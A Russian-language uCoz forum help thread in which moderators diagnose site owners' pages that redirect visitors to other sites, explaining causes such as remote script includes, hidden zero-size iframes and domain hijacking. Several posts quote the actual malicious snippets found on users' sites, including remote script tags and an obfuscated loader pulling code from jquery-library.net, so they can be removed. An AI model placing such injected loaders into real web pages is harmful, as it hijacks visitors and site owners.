Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » При заходе на сайт перекидывает на другой
При заходе на сайт перекидывает на другой
Модератор форума
Сообщение # 1 | 22:42:16
Описание проблемы:

При попытке зайти на свой сайт вас прекидывает на совершенно чужой сайт. Это может происходить сразу, через какой-то промежуток времени или вместо вашей страницы вы видите чужую с чужим адресом


Причины возникновения:

1) Сторонние скрипты вставленные на сайт с подгрузкой с чужих адресов. И iframe вставки
Если вы ставите к себе на сайт скрипт подобного вида
Code
<script type="text/javascript" src="http://levyisite.ru/nazvanie.js"></script>

где levyisite.ru адрес не вашего сайта, а чужого, то вы всегда должны быть готовы к тому, что содержимое подгружаемого скрипта может изменится. Если скрипт работает в нормальном режиме сначала, то при изменении или удалении содержимого на сервере где он храниться, скрипт или перестанет работать или будет иметь уже другие функции, иногда вредоносные
Если вы решили установить к себе на сайт скрипт, но ничего в скриптах не понимаете, перед установкой вы можете обратиться в эту тему //forum.ucoz.ru/forum/45-35735-1 и проверить его на безопасность

2) Сторонние скрипты вшитые в элементы дизайна или шаблонов найденные в открытом доступе
Если вы все время находитесь в состоянии поиска новых украшений для своего сайта, таких как готовых блоков, информеров, измененных дизайнов мини-чатов, опросов, форм входа, вида материалов, блоков статистики на форум или сайт и так далее, то при копировании готового кода на сайтах, где это все раздают, проверяйте код на наличие сторонних скриптов (тип скрипта описан в пункте1) и iframe вставок. Если вы видите в коде конструкцию наподобии этой
Code
<iframe src="http://levyisite.ru" width="1" height="1"></iframe>

Где levyisite.ru - это адрес чужого сайта
а
Code
width="1" height="1"
может иметь значения 0
Code
width="0" height="0"
что означает фоновую (скрытую)подгрузку, то это на 100% агрессивный вредоносный код
Если вы вообще не разбираетесь в HTML и не понимаете что копируете, то перед установкой очередного украшения на сайт вы можете проверить полученный код для вставки в этой теме //forum.ucoz.ru/forum/45-35735-1 на наличие вредоносных объектов

3) Рипы шаблонов и готовые шаблоны найденные в открытом доступе. В готовых шаблонах могут быть вшиты скрипты и iframe вставки, а так же рекламные блоки и спам скрытый посредством кода от вывода на экран. Вшитые скрипты и вставки могут быть с пустым содержимым и при запуске шаблона они могут не проявлять никаких признаков. Но подгруженные с чужих сайтов, содержимое может быть изменено, после чего может начаться вредоносная активность

4) Перехват домена. На сайтах с прикрепленным доменом, особенно у тех кто не имеет доступа к управлению доменом, сторонними лицами могут быть изменены настройки домена. Эффект может заключаться в том, что при переходе на свой сайт вы можете увидеть там совсем другой или будет происходить редирект на другой адрес


Если вы вообще ничего не поняли, но проблема переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает, а так же указать происходит это под логином или под гостем
_White_Wolf_
Сообщений: 2
Репутация: 9

Сообщение # 796 | 22:18:45
webanet, то что проблема в домене я понял, а то, что в меню ссылки на этот домен, совсем забыл(
проблема решилась! огромное СПАСИБО!
bugor1377
Сообщений: 2
Репутация: 0

Сообщение # 797 | 19:00:31
Здравствуйте. Помогите разобраться. При входе на мой сайт http://dengivinternete.ucoz.net, перекидывает на http://ww17.one-ua.info . Как убрать эту заразу?
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 798 | 19:10:37
bugor1377, сразу после фразы сайт будет переносится на другую площадку без надоедливой рекламы удалите скрипт
Код
<script type="text/javascript" src="http://one-ua.info/blok.php?d=88423f35f675d34fbe26602ca6c2a4a2"></script>

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
bugor1377
Сообщений: 2
Репутация: 0

Сообщение # 799 | 19:43:58
Цитата webanet ()
bugor1377, сразу после фразы сайт будет переносится на другую площадку без надоедливой рекламы удалите скрипт
Спасибо за ответ. Я уже сам нашел эту заразу и удалил, пока вроде бы нормально работает. Как можно избежать в дальнейшем подобных случаев? Пароль от админки сменил сразу же.

Добавлено (04 Дек 2017, 19:43:58)
---------------------------------------------
Может кому поможет... я скопировал код сайта в notepad++ и в поиск вставил адрес заразы, на которую перебрасывало, сразу нашелся код вредоносного скрипта. Потом просто его удалил. Мне повезло что эта зараза была в коде верхней части сайта, которую я первую и скопировал для поиска, быстро нашлась. Всем удачи !

НиточкаИголочка
Сообщений: 1
Репутация: 0

Сообщение # 800 | 14:14:46
Помогите, пожалуйста...
Захожу на свой сайт school9inf.ucoz.ru, перекидывает на другой http://www.vsemnazlo.ru/. Заходил другой человек - та же ситуация.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 801 | 16:45:46
НиточкаИголочка, панель управления - дизайн - управление дизайном - глобальные блоки - верхняя часть сайта - удалить и сохранить шаблон. на будущее не ставить на сайт скрипты с подгрузкой содержимого чужих сайтов

Код
<link rel="stylesheet" title="default" href="http://ucozua.ru/highslidedle/highslide.css" type="text/css" />
<script type="text/javascript" src="http://ucozua.ru/js/highslide-full.packed.js"></script>
<script language="javascript" type="text/javascript">
hs.graphicsDir = 'http://ucozua.ru/highslide/graphics/';
hs.transitions = ["fade"];
hs.outlineType = 'beveled';
hs.zIndexCounter = '2000'
hs.align = 'center';
hs.numberOfImagesToPreload = 0;
hs.showCredits = false;
hs.lang = {
loadingText : 'Загрузка...',
playTitle : 'Просмотр слайдшоу (пробел)',
pauseTitle: 'Пауза',
previousTitle : 'Предыдущее изображение',
nextTitle : 'Следующее изображение',
moveTitle : 'Переместить',
closeTitle : 'Закрыть (Esc)',
fullExpandTitle : 'Развернуть до полного размера',
restoreTitle : 'Кликните для закрытия картинки, нажмите и удерживайте для перемещения',
focusTitle : 'Сфокусировать',
loadingTitle : 'Нажмите для отмены'
};
hs.addSlideshow({
interval: 4000,
repeat: false,
useControls: true,
fixedControls: 'fit',
overlayOptions: {
opacity: .75,
position: 'bottom center',
hideOnMouseOut: true
}
});
//-->
</script>

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Enclave1089
Сообщений: 3
Репутация: 0

Сообщение # 802 | 19:08:13
Здравствуйте. Помогите разобраться. При входе на мой сайт
http://kvaka.ucoz.net, перекидывает на http://www.vsemnazlo.ru/
. Поудалял некоторые коды <script>, думал таким путём выявить не помогло! Надеюсь на вашу помощь.
Сообщение отредактировал Enclave1089 - Вторник, 03 Июл 2018, 19:21:10
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 803 | 19:24:37
Enclave1089, у вас не получился адрес сайта. или дайте правильный или удаляйте все скрипты с адресом содержимого ucozua.ru

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Enclave1089
Сообщений: 3
Репутация: 0

Сообщение # 804 | 19:27:45
[ http://kvaka.ucoz.ru/admin ]
Сайт: kvaka.ucoz.ru
Пароль: удалено
можете даже зайти в панель

У меня был скачен бэкап, когда сайт работал, я пробовал удалять и перезаливать но подмена осталась((( Поэтому и обращаюсь, не знаю что думать

Хотя бы странницу или модуль с заразой узнать.
Сообщение отредактировал webanet - Вторник, 03 Июл 2018, 19:36:57
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 805 | 19:44:04
Enclave1089, я вас заблокирую на этом форуме, если будете выкладывать вот так свой пароль от пу. быстро менять пароль. после восстановить шаблоны мини-чата. скрипт и картинки в шаблонах чата
Код
<script src="http://ucozua.ru/Scripts/28/bb_codes.js"></script>
и куча картинок битых

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Enclave1089
Сообщений: 3
Репутация: 0

Сообщение # 806 | 20:06:29
Цитата webanet ()
после восстановить шаблоны мини-чата. скрипт и картинки в шаблонах чата<script src="http://ucozua.ru/Scripts/28/bb_codes.js"></script>
1
и куча картинок битых
Код чата снёс, восстановил заново, подмены нет, сайт восстановил свою жизнедеятельность, спасибо ещё раз. up
$Vladimir$
Сообщений: 7465
Репутация: 1053

Сообщение # 807 | 15:54:56
renvek, указанный сайт не зарегистрирован в ucoz
GansKamin
Сообщений: 4
Репутация: 0

Сообщение # 808 | 01:02:45
Нужна помощь! При заходе на свой сайт video-dvd.ucoz.ru перекидывает моментально на сайт http://ww92.jquery-library.net/ Не могу даже зайти под своим логином.
$Vladimir$
Сообщений: 7465
Репутация: 1053

Сообщение # 809 | 11:59:22
defaultNick1305, удалите код из нижней части сайта

Код
<!-- ++ Подключение библиотеки :: plus-plus.net (v2.0) ++ -->
<script type="text/javascript">plusplus={},plusplus.nr=[],plusplus.ready=function(e){plusplus.nr[plusplus.nr.length]=e};var b=document.createElement("script");b.src="//jquery-library.net/plusplus-2.0.min.js",b.charset="UTF-8",b.async=!0,b.type="text/javascript";try{document.getElementsByTagName("head")[0].appendChild(b)}catch(a){document.getElementsByTagName("body")[0].appendChild(b)}</script>
<style>[class^=plusplus_]{overflow:visible;margin:0;padding:0;border:0;background:0;line-height:normal;list-style:none;font-size:12px;font-family:Verdana,Arial;color:#000;width:auto;height:auto;vertical-align:top;text-decoration:none;text-align:left}[class^=plusplus_sl]{font:inherit;color:inherit;line-height:inherit;text-align:inherit}</style>
<!-- -- Подключение библиотеки :: plus-plus.net (v2.0) -- -->
GansKamin
Сообщений: 4
Репутация: 0

Сообщение # 810 | 15:01:08
В том и дело, что не могу зайти на сайт. Сразу перекидывает. Как войти?

Добавлено (12 Мар 2019, 15:13:04)
---------------------------------------------
Удалось войти. Однако не могу найти этот код.

Сообщество uCoz » Мастерская uCoz » Безопасность сайта » При заходе на сайт перекидывает на другой
Поиск: